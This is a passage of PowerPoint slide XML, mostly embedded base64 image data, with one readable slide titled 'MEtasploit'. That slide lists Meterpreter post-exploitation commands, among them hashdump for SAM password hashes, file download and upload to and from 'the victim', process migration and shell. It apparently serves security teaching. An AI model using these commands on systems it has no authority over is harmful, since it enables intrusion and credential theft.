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8755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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MEtasploit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7975" y="1143000"/>
            <a:ext cx="8181974" cy="5029200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Commands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	help – shows all available commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	background – backgrounds the session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – shows all processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	migrate &lt;process id&gt;– moves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	another process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – shows the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	download &lt;file&gt; - pulls a file from the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	upload &lt;file on attacker&gt; &lt;file on victim&gt; -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	pushes a file to the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – dumps the hashes from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	shell – drops you in a shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQREBQUEhIVFRIWFRQUFBUUERUUFBYVFhQVGBUUFRQXHCYeFxojGhUUHy8gIycqLCwsFx4xNTAqNSYrLCoBCQoKDgwOGg8PGiwkHyQpLCksLCwsLCwsLCwpLCksLCksLCwsLCksLCwsLCksLCwsLCksLCkpLCwsLCksLCwsLP/AABEIAOEA4QMBIgACEQEDEQH/xAAcAAABBQEBAQAAAAAAAAAAAAAAAwQFBgcCAQj/xABHEAACAQIDBAYHBAkCBAcBAAABAgMAEQQSIQUGMUETIlFhcZEHMlKBobHBFCNy0TNCYoKissLh8BVzNIOS8SREU2OTs9Il/8QAGQEAAwEBAQAAAAAAAAAAAAAAAAIDAQQF/8QAJREAAgICAwACAgIDAAAAAAAAAAECESExAxJBIlEEE5GhQmFx/9oADAMBAAIRAxEAPwDcaKKKACiiigAooooAKK8LW41E4rb4vliXpG7f1R7+f+a1tWY3RLE1H4nb0SaZsx7F1+PD41GPhpJdZnNvYXQfl86XhwiJ6qgd/E+ZraMtg23JX/Rw2Ha5/wC1JMcS3rShe5R+Q+tO6pm7O/7YraE+FkhWMJ0oiYOWLmGTLIDew4ENYDkeNMl9GP8A2WQ7MLe